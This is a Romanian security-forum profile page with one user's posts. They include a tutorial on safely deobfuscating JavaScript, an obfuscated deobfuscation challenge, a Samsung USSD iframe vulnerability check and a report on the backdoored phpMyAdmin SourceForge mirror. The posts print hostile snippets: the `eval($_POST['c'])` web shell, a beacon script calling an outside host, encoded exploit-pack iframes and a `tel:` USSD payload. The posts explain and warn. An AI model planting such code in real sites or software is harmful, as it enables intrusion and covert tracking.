-
Posts
388 -
Joined
-
Last visited
-
Days Won
16
Everything posted by B7ackAnge7z
-
P?i, depinde unde dore?ti s? execu?i acest script. De exemplu, dac? pe un server ce are instalat Python-ul ?i ai folderul /cgi-bin — salveaz?-l acolo, folosind extensia „.py”.
-
Pentru a vedea ce proces modific? pozele, descarc? ?i execut? aplica?ia Process Monitor, pentru care adaugi urm?torul ”Filtru” (Ctrl+L): Path | begins with | X:\path\to\pictures | then | Include Dup? ce adaugi filtrul, apas? „Capture” (Ctrl+E), iar în folderul X:\path\to\pictures\ salveaz? câteva poze: la scurt timp Process Monitor î?i va ar?ta toate detaliile despre aplica?ia care modific? fi?ierele din acest folder. ps. Desigur, adresa folderului este un simplu exemplu.
-
Cu siguran?? mul?i dintre voi cunoa?te?i sintaxa JavaScript, pute?i scrie ?i citi un fragment de cod scris în acest limbaj, îns? cu toate acestea a?i întâlnit scripturi JavaScript, care la prima vedere par indescifrabile. Dac? faci parte din acest grup ?i dore?ti s? afli câteva trucuri ce te-ar ajuta s? decriptezi scripturile „obfuscate” — î?i propun s? cite?ti acest mic tutorial. De asemenea, a? recomanda tutorialul ?i celor care au ceva experien?? în domeniu — c?ci deseori am v?zut c? ei folosesc tehnici nu tocmai sigure pentru a ob?ine un cod lizibil. » Ce este un obfuscator ?i la ce folose?te? În caz c? nu ?tia?i, un obfuscator este aplica?ia ce are ca scop transformarea codului surs? într-un cod indescifrabil, care r?mâne perfect func?ional chiar dac? sursa a fost modificat? ?i la final arat? ca naiba. De cele mai multe ori, obfuscatorul este folosit pentru a ascunde codul de „cititorii nepofti?i”, astfel încât ei s? nu afle ce func?ie îndepline?te acel script. De asemenea, obfuscatorul mai este folosit ?i pentru a nu permite modificarea ?i utilizarea scriptului f?r? ?tirea autorului. » Diferen?a dintre a obfusca ?i a comprima Multe persoane consider? c? a „obfusca” ?i a „comprima” codul este unul ?i acela?i lucru. Gre?it. E important de ?tiut c?, comprimarea se folose?te pentru a minimaliza cantitatea de cod (acest lucru se ob?ine prin eliminarea comentariilor, spa?iilor ?i altor caractere inutile), astfel comprimarea ajut? la sporirea performan?ei aplica?iei WEB. Pe de alt? parte, obfuscarea face exact invers — pentru a fi posibil? criptarea codului, m?re?te cantitatea de cod (ad?ugând func?ii, cicluri, variabile, etc.), astfel reducând considerabil din performan?a aplica?iei WEB. Pentru a vedea diferen?a dintre obfuscarea ?i comprimarea codului JavaScript, propun s? analiza?i urm?toarele exemple: >> Codul ini?ial (263 caractere): // Verific?m adresa site-ului if (!window.location.hostname != 'www.site.com') { // Preîntâmpin?m utilizatorul alert('Acest site incalc? drepturile de autor'); // Redirec?ion?m utilizatorul window.location.replace('http://www.site.com/'); } >> Codul comprimat (143 caractere): if(!window.location.hostname!='www.site.com'){alert('Acest site incalc? drepturile de autor');window.location.replace('http://www.site.com/')} >> Codul obfuscat (445 caractere): eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('5(!1.2.6!=\'3.0.4\'){7(\'8 0 9? a b c\');1.2.d(\'e://3.0.4/\')}',15,15,'site|window|location|www|com|if|hostname|alert|Acest|incalc|drepturile|de|autor|replace|http'.split('|'),0,{})) Dup? cum pute?i vedea (dac? decripta?i codul obfuscat) singura asem?nare dintre aceste dou? procese este faptul c? în ambele cazuri vor fi eliminate comentariile JavaScript. » De ce e periculos s? înlocuim eval() cu document.write() Am v?zut multe persoane care decodeaz? scripturile înlocuind func?ia eval() cu document.write() f?r? s? se gândeasc? c? scriptul criptat se rezum? la: document.write('<iframe src="//xploit/pack"></iframe>'); De exemplu, dac? criptat, codul de mai sus arat? a?a: eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%2F%2F%78%70%6C%6F%69%74%2F%70%61%63%6B%22%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B')); iar noi înlocuim func?ia eval() cu document.write() ?i execut?m scriptul în browser, iframe-ul v-a înc?rca cu succes con?inutul paginii //xploit/pack: document.write("document.write('<iframe src="//xploit/pack"></iframe>'"); Iat? de ce, niciodat? s? nu folosi?i aceast? metod? (aici ar trebui s? fie un punct) dac? nu rula?i browser-ul pe PC-ul virtual sau nu dori?i s? trimite?i IP-ul spre un server necunoscut. » Despre JsBeautifier ?i alte aplica?ii similare Când apar întreb?rile despre decriptarea scripturilor, majoritatea arat? cu degetul spre JsBeautifier sau alte site-uri ce ofer? aplica?ii similare. Recunosc, JsBeautifier e o aplica?ie foarte util?, îns? e foarte limitat? ?i de regul? e foarte simplu s? o p?c?le?ti. De exemplu, lu?m exemplul de mai sus ?i-l modific?m pu?in: var e = eval, u = unescape; e(u('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%2F%2F%78%70%6C%6F%69%74%2F%70%61%63%6B%22%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B')); Dac? o s? încerca?i s?-l decripta?i cu JsBeautifier, v? anun? din start — pur ?i simplu ve?i r?mâne dezam?gi?i. » Modalit??i gre?ite de decriptare a codului JavaScript Nu exclud faptul c? mul?i nu vor fi de acord, dar personal consider c? a înlocui func?ia eval() cu alert() este o metod? gre?it? (acest lucru se refer? ?i la console.log() sau alt? func?ie similar?). Consider astfel, deoarece aceste func?ii nu permit decriptarea rapid? a codului criptat, plus citirea codului primit e foarte dificil?. Imagina?i-v?, un cod de 10k de caractere care apeleaz? de peste 100 ori la func?ia eval() — cu siguran?? trebuie s? ai nervi de o?el. O alt? metod? gre?it?, dar ?i periculoas?, este ad?ugarea unei linii document.write('<textarea>'); înainte de codul criptat ?i înlocuirea func?iei eval() cu document.write(). Dac? luam exemplul de mai sus, primim urm?torul cod: document.write('<textarea>'); document.write(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%2F%2F%78%70%6C%6F%69%74%2F%70%61%63%6B%22%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B')); document.write('</textarea>'); La executare vom primi un rezultat destul de interesant — va ap?rea un element de tip textarea în care v-a fi scris codul iframe-ului: <textarea><iframe src="//xploit/pack"></iframe></textarea> La prima vedere nimic periculos — iframe-ul nu a înc?rcat nimic, iar codul l-am primit în siguran?? f?r? a permite executarea unor altor func?ii sau linii de cod. Pericolul totu?i exist?, pentru c? cel care a criptat scriptul s-a gândit c? se vor g?si doritori de ai analiza capodopera, ?i cu siguran?? la codul surs? v-a ad?uga ?i ceva de genul: // </textarea> iar criptat, codul v-a ar?ta a?a: document.write(unescape('%2F%2F%20%3C%2F%74%65%78%74%61%72%65%61%3E%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%2F%2F%78%70%6C%6F%69%74%2F%70%61%63%6B%22%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B')); La executare, dat fiind faptul c? HTML nu percepe comentariile JavaScript, linia // </textarea> v-a închide tag-ul elementului <textarea> ?i iframe-ul v-a înc?rca exploit-ul cu succes. » Decriptarea eficient? ?i sigur? a unui cod JavaScript Metoda pe care vreau s? v-o prezint, o foloseam cu ceva timp în urm?, ?i întotdeauna mi-a permis s? decodez rapid practic orice cod criptat scris în JavaScript. De aceea m-am gândit c? ar fi bine scriu despre aceasta, astfel ajutând pe cei mai pu?ini experimenta?i ?i protejându-i de eventualule pericole. Apropo, ar fi dr?gu? dac? a?i posta comentarii în care s? descrie?i metodele folosite de voi. Deci, metoda e foarte simpl? — trebuie s? redefinim func?iile eval() ?i document.write(), iar datele trimise c?tre acestea s? le scriem într-o c?su??: <!-- Cre?m c?su?a unde for fi salvate datele --> <textarea id="js" style="width:80%;height:200px"></textarea> <script> // Ob?inem elementul textarea var txt = document.getElementById('js'); // Redefinim func?iile document.write = window.eval = function (str) { // Scriem codul ce trebuia executat în c?su?a textarea txt.value += str; // Nu ne facem probleme în privin?a tag-urilor HTML, deoarece // browser-ul are grij? ca c?su?a s? fie completat? corespunz?tor }; </script> Dac? compres?m codul de mai sus, ob?inem dou? linii de cod, care mereu trebuie s? fie la îndemân?: <textarea id="js" style="width:80%;height:200px"></textarea> <script>var txt=document.getElementById('js');document.write=window.eval=function(str){txt.value+=str}</script> Desigur, dac? întâlni?i zilnic astfel de „sarcini”, poate fi creat ?i un JavaScript Bookmarklet, care s? fie accesat direct din browser. Nu recomand aceast? metod? (de alt fel, ca ?i oricare alta) celor care nu au idee ce fac func?iile document.createElement() sau {obj}.appendChild() — ar fi prea periculos. Iar în caz c? v? este fric? de alte func?ii, dar totu?i dori?i s? decripta?i orice cod scris în JavaScript — pur ?i simplu redefini?i-le al?turi de eval() ?i document.write() Decriptare pl?cut? ?i f?r? incidente.
-
E gre?it s? consideri c? "vizita e f?r? referer" dac? nu a venit de pe pagina 100 sau 200. Încearc? print_r($_SERVER['HTTP_REFERER']); s? vezi ce prime?ti. ps. Întâmplator cu Chrome nu intri de pe /pagina100, dar cu Firefox de pe /pagina101?
-
Probabil la ora asta to?i telepa?ii au mers la culcare. Totu?i, încearc? s? scrii mai detaliat ce dore?ti s? faci, ?i arat? câteva linii de cod. ps. Poate ai instalat vreun addon pentru Firefox ce blocheaz? trimiterea referer-ului.
-
M? gândeam ast?zi s? scriu un articol despre cum s? faci propriul obfuscator JavaScript — un obfuscator ce nu poate fi decriptat automat de JSBeautifier sau alte aplica?ii asemeni lui (desigur, a?a ceva nu exist?). A?a c? am scris scriptul care „cripteaz?” codul surs?, am testat (în browserele Firefox, Chrome ?i IE) s? vad dac? nu mi-a sc?pat nimic, ?i într-un final, am f?cut o pagin? HTML ce permite s? inserezi ?i s? „criptezi” codul JavaScript în mod automat. Dar, înainte de a scrie articolul, am hot?rât s? verific cât de rapizi ?i cât de aten?i sunte?i. Dup? aceasta, mai vedem noi cum proced?m cu articolul — dac? v? intereseaz? acest subiect, voi scrie articolul cu mare pl?cere. Deci, mai jos ave?i o versiune mai simpl? a codului criptat. Voi trebuie s?-l decripta?i cu mare aten?ie, iar dup? ce ob?ine?i sursa JavaScript, îmi trimite?i un PM cu codul surs? ?i metoda care a?i folosit-o. eval(unescape("%28function%20%28r%2C%20s%2C%20t%29%20%7B%0A%20%20%20%20var%20decode%20%3D%20function%20%28c%29%20%7Bvar%20ox%20%3D%20hash%20%3D%3D%20r%20%3F%201%20%3A%202%3Breturn%20String.fromCharCode%28c%20*%20ox%29%3B%7D%3B%0A%20%20%20%20var%20exec%20%3D%20function%20%28i%29%20%7Bif%20%28typeof%20i%20%3D%3D%20%22number%22%29%20%7Bvar%20cc%20%3D%20lines%5Bi%5D%20/%20t%20/%20len%3Bi%20%3D%20%22decode%28cc%29%22%3B%7Dreturn%20eval%28i%29%3B%7D%3B%0A%20%20%20%20var%20lines%20%3D%20s.split%28%22%5Cu2063%22%29%3B%0A%20%20%20%20var%20arg%20%3D%20arguments.callee.toString%28%29.replace%28/%5B%5Ea-z0-9%5D/gi%2C%20%22%22%29%3B%0A%20%20%20%20var%20hash%20%3D%20arg.replace%28/%5B%5Ea-f%5D/g%2C%20%22%22%29%3B%0A%20%20%20%20var%20len%20%3D%20arg.length%3B%0A%20%20%20%20var%20str%20%3D%20%22%22%3B%0A%20%20%20%20for%20%28var%20i%20%3D%200%3B%20i%20%3C%20lines.length%3B%20i++%29%20%7B%0A%20%20%20%20%20%20%20%20str%20+%3D%20exec%28i%29%3B%0A%20%20%20%20%7D%0A%20%20%20%20exec%28str%29%3B%0A%7D%29%28%22fcadecdefccaaefadecaeecfcfefbeacceedecdecceeaaeaaaecaeeeaceaaaaeaceafaeaeafaeeeeceec%22%2C%20%2219647376%u206317335920%u206318161440%u206316510400%u206318326544%u206319647376%u20637594784%u206318326544%u206318161440%u206317831232%u206318326544%u206316015088%u206316510400%u20635283328%u206310071344%u20635283328%u206316840608%u206319317168%u206318161440%u206316345296%u206319152064%u206317335920%u206318326544%u206318161440%u20635283328%u20636604160%u20636769264%u20635283328%u206320307792%u20631651040%u20635283328%u20635283328%u20635283328%u206316840608%u206319317168%u206318161440%u206316345296%u206319152064%u206317335920%u206318326544%u206318161440%u20635283328%u206318821856%u206316015088%u206318161440%u206316510400%u20636604160%u20636769264%u20635283328%u206320307792%u20631651040%u20635283328%u20635283328%u20635283328%u20635283328%u20635283328%u20635283328%u206318821856%u206316675504%u206319152064%u206319317168%u206318821856%u206318161440%u20635283328%u206312713008%u206316015088%u206319152064%u206317170816%u20637594784%u206316840608%u206317831232%u206318326544%u206318326544%u206318821856%u20636604160%u206312713008%u206316015088%u206319152064%u206317170816%u20637594784%u206318821856%u206316015088%u206318161440%u206316510400%u206318326544%u206317996336%u20636604160%u20636769264%u20635283328%u20636934368%u20635283328%u20639410928%u20639410928%u20639410928%u20639410928%u20639410928%u20636769264%u20639741136%u20631651040%u20635283328%u20635283328%u20635283328%u206320638000%u20631651040%u20631651040%u20635283328%u20635283328%u20635283328%u206319482272%u206316015088%u206318821856%u20635283328%u206318656752%u20635283328%u206310071344%u20635283328%u206315024464%u206318821856%u206316015088%u206318161440%u206316510400%u20636604160%u20636769264%u20637264576%u20635283328%u206318821856%u206316015088%u206318161440%u206316510400%u20636604160%u20636769264%u206315354672%u20631651040%u20635283328%u20635283328%u20635283328%u206318656752%u206315024464%u20638255200%u206315354672%u20635283328%u206310071344%u20635283328%u206312713008%u206316015088%u206319152064%u206317170816%u20637594784%u206316840608%u206317831232%u206318326544%u206318326544%u206318821856%u20636604160%u20636604160%u206318656752%u206315024464%u20637924992%u206315354672%u20635283328%u20637099472%u20635283328%u206318656752%u206315024464%u20638090096%u206315354672%u20636769264%u20635283328%u20637759888%u20635283328%u20638255200%u20636769264%u20639741136%u20631651040%u20635283328%u20635283328%u20635283328%u206318656752%u206315024464%u20638420304%u206315354672%u20635283328%u206310071344%u20635283328%u206312713008%u206316015088%u206319152064%u206317170816%u20637594784%u206316840608%u206317831232%u206318326544%u206318326544%u206318821856%u20636604160%u20636604160%u206318656752%u206315024464%u20637924992%u206315354672%u20635283328%u20637099472%u20635283328%u206318656752%u206315024464%u20638090096%u206315354672%u20635283328%u20637429680%u20635283328%u206318656752%u206315024464%u20637924992%u206315354672%u20635283328%u20637099472%u20635283328%u206318656752%u206315024464%u20638255200%u206315354672%u20636769264%u20635283328%u20637759888%u20635283328%u20638255200%u20636769264%u20639741136%u20631651040%u20635283328%u20635283328%u20635283328%u20631651040%u20635283328%u20635283328%u20635283328%u20637759888%u20637759888%u20635283328%u206313868736%u206317170816%u206317335920%u206318986960%u20635283328%u206317335920%u206318986960%u20635283328%u206319317168%u206318986960%u206316675504%u206316510400%u20635283328%u206319152064%u206318326544%u20635283328%u206316345296%u206318326544%u206319317168%u206318161440%u206319152064%u20635283328%u206317170816%u206318326544%u206319647376%u20635283328%u206317996336%u206316015088%u206318161440%u206319977584%u20635283328%u206318491648%u206316675504%u206318326544%u206318491648%u206317831232%u206316675504%u20635283328%u206316015088%u206318821856%u206316675504%u20635283328%u206316345296%u206316015088%u206318821856%u206316675504%u206317831232%u206316675504%u206318986960%u206318986960%u20631651040%u20635283328%u20635283328%u20635283328%u206319482272%u206316015088%u206318821856%u20635283328%u206316675504%u206317831232%u206317996336%u20635283328%u206310071344%u20635283328%u206316510400%u206318326544%u206316345296%u206319317168%u206317996336%u206316675504%u206318161440%u206319152064%u20637594784%u206316345296%u206318821856%u206316675504%u206316015088%u206319152064%u206316675504%u206311392176%u206317831232%u206316675504%u206317996336%u206316675504%u206318161440%u206319152064%u20636604160%u20636439056%u206317335920%u206316840608%u206318821856%u206316015088%u206317996336%u206316675504%u20636439056%u20636769264%u20639741136%u20631651040%u20635283328%u20635283328%u20635283328%u206316675504%u206317831232%u206317996336%u20637594784%u206318986960%u206316675504%u206319152064%u206310731760%u206319152064%u206319152064%u206318821856%u206317335920%u206316180192%u206319317168%u206319152064%u206316675504%u20636604160%u20636439056%u206318986960%u206318821856%u206316345296%u20636439056%u20637264576%u20635283328%u20636439056%u206317170816%u206319152064%u206319152064%u206318491648%u20639576032%u20637759888%u20637759888%u206319152064%u206316675504%u206318986960%u206319152064%u20637594784%u206318986960%u206316675504%u206316345296%u206319317168%u206318821856%u206318821856%u206317335920%u206319152064%u206319977584%u20637594784%u206318821856%u206319317168%u20637759888%u206316345296%u206317170816%u206316015088%u206317831232%u206317831232%u206316675504%u206318161440%u206317005712%u206316675504%u206318986960%u20637759888%u206317501024%u206318986960%u206318326544%u20637759888%u206319812480%u206319977584%u206320142688%u20637594784%u206318491648%u206317170816%u206318491648%u206310401552%u206317170816%u206316015088%u206318986960%u206317170816%u206310071344%u20636439056%u20635283328%u20637099472%u20635283328%u206318656752%u20637594784%u206317501024%u206318326544%u206317335920%u206318161440%u20636604160%u20636439056%u20637594784%u20636439056%u20636769264%u20636769264%u20639741136%u20631651040%u20635283328%u20635283328%u20635283328%u206316675504%u206317831232%u206317996336%u20637594784%u206318986960%u206316675504%u206319152064%u206310731760%u206319152064%u206319152064%u206318821856%u206317335920%u206316180192%u206319317168%u206319152064%u206316675504%u20636604160%u20636439056%u206317170816%u206316675504%u206317335920%u206317005712%u206317170816%u206319152064%u20636439056%u20637264576%u20635283328%u20637924992%u20636769264%u20639741136%u20631651040%u20635283328%u20635283328%u20635283328%u206316675504%u206317831232%u206317996336%u20637594784%u206318986960%u206316675504%u206319152064%u206310731760%u206319152064%u206319152064%u206318821856%u206317335920%u206316180192%u206319317168%u206319152064%u206316675504%u20636604160%u20636439056%u206317170816%u206316675504%u206317335920%u206317005712%u206317170816%u206319152064%u20636439056%u20637264576%u20635283328%u20637924992%u20636769264%u20639741136%u20631651040%u20635283328%u20635283328%u20635283328%u206316675504%u206317831232%u206317996336%u20637594784%u206318986960%u206316675504%u206319152064%u206310731760%u206319152064%u206319152064%u206318821856%u206317335920%u206316180192%u206319317168%u206319152064%u206316675504%u20636604160%u20636439056%u206318986960%u206319152064%u206319977584%u206317831232%u206316675504%u20636439056%u20637264576%u20635283328%u20636439056%u206316510400%u206317335920%u206318986960%u206318491648%u206317831232%u206316015088%u206319977584%u20639576032%u206318161440%u206318326544%u206318161440%u206316675504%u20639741136%u20635283328%u206317996336%u206316015088%u206318821856%u206317005712%u206317335920%u206318161440%u20637429680%u206317831232%u206316675504%u206316840608%u206319152064%u20639576032%u20637429680%u20639410928%u20639410928%u20639410928%u206318491648%u206319812480%u20636439056%u20636769264%u20639741136%u20631651040%u20635283328%u20635283328%u20635283328%u206316510400%u206318326544%u206316345296%u206319317168%u206317996336%u206316675504%u206318161440%u206319152064%u20637594784%u206316180192%u206318326544%u206316510400%u206319977584%u20637594784%u206316015088%u206318491648%u206318491648%u206316675504%u206318161440%u206316510400%u206311061968%u206317170816%u206317335920%u206317831232%u206316510400%u20636604160%u206316675504%u206317831232%u206317996336%u20636769264%u20639741136%u20631651040%u206320638000%u20639741136%22%2C%20607%29%3B")); Finali?ti: 15-11-2012, 06:23 PM ? baltag 17-11-2012, 07:09 PM ? grinder
-
Ini?ial m? gândeam s? postez în Linkuri, dar m-am r?zgândit. Oricum, dac? vreun moderator crede de cuviin??, poate schimba categoria. ps. Chestiile cu adev?rat interesante trebuie s? aib? loc în Bookmarks ?i, dac? este necesar, pe discul local sub forma unui document sau cod surs? (asta dac? nu dore?ti ca data viitoare când accesezi pagina mult-dorit? s? vezi un ”not found”).
-
Ghici?i ce face urm?torul cod, care merge perfect pe Firefox, Chrome ?i Internet Explorer. <script> ????= /??´?? ~??? //*´??*/ ['_']; o=(???) =_=3; c=(???) =(???)-(???); (???) =(???)= (o^_^o)/ (o^_^o); (???)={???: '_' ,???? : ((????==3) +'_') [???] ,???? ????+ '_')[o^_^o -(???)] ,???????==3) +'_')[???] }; (???) [???] ????==3) +'_') [c^_^o]; (???) ['c'] = ((???)+'_') [ (???)+(???)-(???) ]; (???) ['o'] = ((???)+'_') [???]; (?o?)=(???) ['c']+(???) ['o']+(???? +'_')[???]+ ((????==3) +'_') [???] + ((???) +'_') [(???)+(???)]+ ((???==3) +'_') [???]+((???==3) +'_') [(???) - (???)]+(???) ['c']+((???)+'_') [(???)+(???)]+ (???) ['o']+((???==3) +'_') [???]; (???) ['_'] =(o^_^o) [?o?] [?o?]; (???)???==3) +'_') [???]+ (???) .????+((???)+'_') [(???) + (???)]+((???==3) +'_') [o^_^o -???]+((???==3) +'_') [???]+ (???? +'_') [???]; (???)+=(???); (???)[???]='\\'; (???).????=(???+ ???)[o^_^o -(???)]; (o???o)=(???? +'_')[c^_^o]; (???) [?o?]='\"'; (???) ['_'] ( (???) ['_'] (???+(???)[?o?]+ (???)[???]+(???)+ (???)+ (???)+ (???)[???]+(???)+ ((???) + (???))+ (???)+ (???)[???]+(???)+ (???)+ ((???) + (???))+ (???)[???]+(???)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (???))+ (???)[???]+(???)+ ((o^_^o) +(o^_^o))+ (???)+ (???)[???]+((???) + (???))+ (c^_^o)+ (???)[???]+(???)+ ((o^_^o) - (???))+ (???)[???]+(???)+ ((o^_^o) - (???))+ ((o^_^o) - (???))+ (???)[???]+(???)+ ((o^_^o) - (???))+ (o^_^o)+ (???)[???]+(???)+ ((o^_^o) - (???))+ (???)+ (???)[???]+(???)+ (c^_^o)+ (???)[???]+(???)+ (c^_^o)+ (o^_^o)+ (???)[???]+(???)+ (???)+ ((???) + (???))+ (???)[???]+(???)+ ((???) + (???))+ ((o^_^o) +(o^_^o))+ (???)[???]+(???)+ ((o^_^o) +(o^_^o))+ (???)+ (???)[???]+(???)+ (???)+ ((???) + (???))+ (???)[???]+(???)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (???))+ (???)[???]+(???)+ ((o^_^o) - (???))+ (???)[???]+((???) + (???))+ (???)+ (???)[???]+((???) + (o^_^o))+ (o^_^o)+ (???)[?o?]) (???)) ('_'); </script> Folosind acest encoder, alert("RST Center"); v-a ar?ta ca în codul de mai sus. Encode any JavaScript program to Japanese style emoticons ()
-
Cum sa ajungi in top 10 Google dupa keyword-ul tau.
B7ackAnge7z replied to Oust's topic in Black SEO & monetizare
În astfel de vazuri, concuren?a poate folosi Disavow links: Totu?i, dup? spusele lor, în majoritatea cazurilor Google va ?ti care link-uri sunt de încredere.- 53 replies
-
- 7 pizde ursuze.
- keywork
-
(and 2 more)
Tagged with:
-
Mi-am adus aminte de The Powerbook Prank ?i Welcome to the 419 Eater
-
Îmi cer scuze pentru offtopic, dar trebuie s? v? prezint ?i aceast? func?ie scris? în PHP: /** * Find the sum of 2 natural numbers * * @version 1.0 beta * @author CERN * @license Use at your own risk * * @param int $x * @param int $y * @return int */ function sum($x, $y) { if($x == 0) return $y; if($y == 0) return $x; $sx = sum($x, $y - 1); $sy = sum($x - 1, $y); return ($sx + $sy) / 2 + 1; }
-
Ai nevoie de un script care la un interval de <59 minute schimb? data sistemului de operare. Astfel, cu siguran?? vei sc?pa de ambele limite.
-
Din fericire (sau nu?) doar ~400 utilizatori au desc?rcat acest backdoor — deci, trebuie c?uta?i cu lumân?rica.
-
Mai întâi de toate poveste?te-ne ce ai încercat, ce ai g?sit, ce nu s-a primit, cât timp ?i-a luat, ?.a.
-
E afi?at? doar dac? accesezi direct adresa URL. Doream s? spun c? Google nu poate afla de aceast? re?et? dac? nu faci m?car o singur? referin??. Sau, se poate de încercat Google: ad?uga?i URL-ul dumneavoastr?
-
Dac? am în?eles corect, re?eta trebuie acceptat? de un moderator pentru a fi afi?at? pe prima pagin?/rubric?/rezultatele c?ut?rii/re?ete noi/comentarii. Dac? e a?a, cred c? în curând re?eta va fi ?tears?, iar s?rmanele gospodine vor r?mâne dependente de b?rba?i, nefiind în stare s?-?i prepare singure elixirul. ps. P?cat c? nu ai pus ?i poz?
-
Se poate ?i ceva real, din via?? cum se spune. În urm?toarea imagine este afi?at rezultatul alegerilor parlamentare 2012 din Rusia, regiunea Rostov (total 146,47%):
-
Într-o oarecare m?sur? ai dreptate. La urma urmei depinde care-i scopul final. De exemplu, dac? dore?ti s? demonstrezi o vulnerabilitate într-o pagin? WEB, cred c? Peeep.us e mult mai interesant.
-
Cu ajutorul Peeep.us pute?i salva gratuit sursa HTML a oric?rei pagini WEB. Eu a? spune, un fel de Google Cache, doar c? nu ?terge niciodat? paginile salvate ?i, cel mai important, po?i salva copia paginii chiar ?i atunci când logat pe acel site. Plus, adresa URL e mai scurt? Deci: este salvat? doar sursa HTML, f?r? imagini ?i fi?iere .css sau .js — astfel, dac? administra?ia site-ului salvat, modific?/?terge fi?ierele de pe server, pot ap?rea unele probleme la vizualizare. Îns?, r?mâne ce-i mai important — informa?ia. Aten?ie! Când salva?i o pagin? de pe un site unde sunte?i logat, ma mult ca sigur c? în sursa paginii sunt date confiden?iale. Folosi?i, de exemplu Firebug, pentru a elimina datele confiden?iale înainte de a salva. ps. Idea de a scrie despre Peeep.us a fost citirea acestui comentariu. De exemplu: copia original? a acestui post.
-
Pentru cei care nu au citit despre Samsung Remote Commands Execution, aduc la cuno?tin?? c? la o conferin?? de securitate a fost demonstrat un exploit, ce permite executarea comenzilor de la distan?? pentru smartphone-urile Samung ce folosesc TouchWiz. Chiar dac? pentru Samsung Galaxy S3 problema a fost reparat? rapid, sa dovedit c? nu numai aceste smartphone-uri sunt vulnerabile, ci ?i urm?toarele: HTC One X HTC Desire HTC Incredible S HTC Sensation Motorola Defy Motorola Atrix Sony Xperia Active Sony Xperia Arc Sony Xperia Ray LG Optimus Black Zopo ZP300 Zopo ZP500 Samsung Galaxy Note ?i probabil, over 9000 Pentru a verifica dac? smartphone-ul t?u e vulnerabil, insereaz? pe o pagin? urm?torul cod HTML: <iframe src="tel:*%2306%23"></iframe> Dac? apare IMEI-ul, atunci telefonul e vulnerabil. În caz contrar, po?i r?sufla u?urat — exploitul pentru telefonul t?u înc? nu e f?cut public. Dup? cum a spus ?i tromfil — „Aten?ie ce accesa?i.” Problem?: Premium SMS + Aceast? Vulnerabilitatea = ?
-
Eu speram c? administra?ia SourceForge.Net va publica mai târziu detalii despre ce ?i cum s-a întâmplat acest lucru. Pân? acum — nimic. Îns?, dat fiind faptul c? a fost compromis doar serverul cdnetworks-kr-1.dl.sourceforge.net, putem presupune c? vinovat se face provider-ul ce de?ine(a) acest server.
-
@gabriel1978, V?zând stilul lui de a discuta, chiar m? gândeam c? destina?ia final? nu va fi cea care ?i-a propus-o. Oricum, sper c? dac? tot îi dai o lec?ie, m?car s? nu fie prea ustur?toare. Desigur, mult mai bine ar fi dac? ajunge?i la un compromis.
-
Citind acest post m? gândeam c? domnul „Netul” mai mult ca sigur c? poate s? fac? ceea ce a scris — se pare c? e o poveste mai veche ?i el are ceva dovezi (doar nu în zadar acuzatul î?i cerea iertare).
-
Scuze c? deranjez, dar de când Sub7 v2.1.5 cost? $150? Sau eu am probleme cu sim?ul umorului? Cine î?i mai aduce aminte de acest design? În fine, tot acolo o s? g?si?i versiunea oficial? a Sub7 v2.1.5 — ?i desigur, nu uita?i s? mul?umi?i celor de la Wayback Machine.
-
De curând echipa ce r?spunde de securitatea phpMyAdmin a anun?at c? unul din serverele SourceForge.Net a fost compromis, iar la arhiva phpMyAdmin-3.5.2.2-all-languages.zip a fost ad?ugat fi?ierul server_sync.php ce con?ine urm?torul cod PHP: <?php @eval($_POST['c']); ?> De asemenea a fost modificat ?i fi?ierul /js/cross_framing_protection.js unde a fost ad?ugat urm?torul cod JavaScript (pentru a afla adresele serverelor infectate): var icon ; icon = document.createElement("img"); icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg"; icon.width=0; icon.height=0; document.body.appendChild(icon); Conform declara?iilor oficiale ale administra?iei SourceForge.Net, aproximativ 400 utilizatori au desc?rcat fi?ierul ce con?ine acest backdoor. Sursa: Compromised SourceForge mirror